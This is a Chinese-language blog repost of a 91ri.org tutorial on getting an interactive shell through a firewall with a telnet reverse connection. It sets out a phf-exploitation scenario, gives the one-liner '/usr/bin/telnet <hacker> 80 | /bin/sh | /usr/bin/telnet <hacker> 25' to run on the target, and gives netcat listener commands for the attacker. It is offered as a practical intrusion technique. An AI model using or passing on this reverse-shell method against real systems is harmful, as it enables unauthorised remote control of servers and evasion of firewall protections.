如何使用telnet进行反向连接

来源:互联网 发布:做淘宝如何和快递公司 编辑:程序博客网 时间:2024/06/05 15:51

原文链接 http://www.91ri.org/7835.html

解决的思路有点意思,所以转过来

telnet反向连接在实战中的作用:

案例1:黑客试图获取某工业级数据包检测防火墙或者路由器之后(基于路由的防火墙,不代理任何服务)的一台UNIX的系统的WEB服务器的访问权。防火墙仅对外网开放了80及443,这台WEB服务器存在phf漏洞(phf漏洞是什么自行脑补),黑客可远程对该web服务器执行命令。此时就可以通过unix自带的telnet获取到一个交互式的SHELL。(91ri.org补充:因为之所以不用NC是因为服务器一般都有安装telnet,且很少受到限制。而connect又是从目标主机中发起,所以可以达到穿透防火墙及内网的作用。)

环境假设:

target ip : 192.168.128.105

hacker ip:192.168.128.100

telnet 反向连接命令:

target :

 

 /usr/bin/telnet 192.168.128.100 80 |/bin/sh |/usr/bin/telnet 192.168.128.100 25

 hacker:

 /opt/netcat/bin/nc -l -n -v -p 80

 /opt/netcat/bin/nc -l -n -v -p 25 

命令说明:实际上我们是将telnet连接到hacker的80端口的NC上,为了与传统的unix的输入输出机制保持一致,我们通过标准输出即键盘通过管道输给了Bourne shell。而由/bin/sh 执行命令的结果再通过管道输出telnet,并返回到hacker的25端口的NC上。

 

本文来自: 网络安全攻防研究室(www.91ri.org) 请尊重作者,转载时带上版权信息。 详细内容请参考:http://www.91ri.org/7835.html

 

0 0